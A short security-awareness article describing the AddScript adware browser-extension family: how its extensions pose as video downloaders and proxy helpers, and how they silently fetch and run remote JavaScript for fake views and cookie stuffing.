AddScript

PUP (Potentially Unwanted Programs) operators and threat actors continue to rely on the AddScript browser extensions family as a source for new intrusive applications. The first AddScript applications were identified by cybersecurity researchers in 2019 and since then the family has remained quite active. Details about this particular group of applications and the general adware and harmful browser extension activities were released by malware experts. 

According to the researchers, the AddScript applications are mostly spread under the guise of useful media tools. More specifically, they promise users the ability to download chosen audio and video content from various sources, such as social networks. Another popular role seen in AddScript applications is that of proxy managers. An important characteristic of this threat family is that its members are almost always capable of carrying out the promised functionalities, as a way to not raise any suspicion and to ensure that users will not remove them. Applications confirmed to belong to this family include the Y2Mate - Video Downloader, SaveFrom.net helper, friGate3 proxy helper, etc. 

However, in the background of the system, the AddScript extension will proceed to perform its nefarious goals. First, the application will contact a hardcoded URL belonging to its Command-and-Control (C2, C&C) server. After establishing a connection to the C2, the AddScript extension will fetch a corrupted JavaScript and then execute it silently. One possible sign of the covert activities that users might notice is an abnormal increase in the consumption of CPU resources. 

The exact functions of the delivered code could vary, based on the specific scheme that the applications' operators are running. For example, the AddScript extension may run videos in the tabs opened in the user's browser to generate profits based on the supposed 'views.' Another possibility is for the intrusive application to perform a scheme known as 'cookie stuffing'/'cookie dropping.' It involves deploying affiliate cookies on the affected device. Afterward, the fraudsters can claim commissions for falsified transactions and traffic that have not occurred.